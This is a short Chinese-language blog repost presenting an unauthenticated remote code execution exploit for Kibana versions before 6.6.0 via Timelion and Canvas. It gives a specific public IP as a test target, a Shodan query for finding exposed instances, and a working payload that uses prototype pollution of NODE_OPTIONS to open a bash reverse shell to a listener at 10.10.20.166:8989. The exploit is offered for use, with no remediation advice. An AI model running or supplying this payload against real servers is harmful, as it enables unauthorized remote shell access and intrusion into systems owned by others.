kibana-RCE <6.6.0 未授权远程代码命令执行 (Need Timelion And Canvas)

Posted ListSec

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了kibana-RCE <6.6.0 未授权远程代码命令执行 (Need Timelion And Canvas)相关的知识,希望对你有一定的参考价值。

测试样例:http://34.197.54.42/app/canvas#/


利用shodan(https://www.shodan.io/search?query=kibana)搜索



poc:

.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/10.10.20.166/8989 0>&1");process.exit()//').props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')


kibana-RCE <6.6.0 未授权远程代码命令执行 (Need Timelion And Canvas)

点击左侧的Canvas之后,就可获取shell。

参考:

https://github.com/jas502n/kibana-RCE


以上是关于kibana-RCE <6.6.0 未授权远程代码命令执行 (Need Timelion And Canvas)的主要内容,如果未能解决你的问题,请参考以下文章

漏洞预警Kibana < 6.6.0 代码执行漏洞

[漏洞预警] kibana < 6.6.0 代码执行漏洞

尝试访问 <img /> 中受保护的视频流时未要求授权 - 标签 = 403 [重复]

未设置授权标头

ProFTPD <=1.3.5 mod_copy 未授权文件复制漏洞

漏洞通告Alibaba Nacos 未授权访问漏洞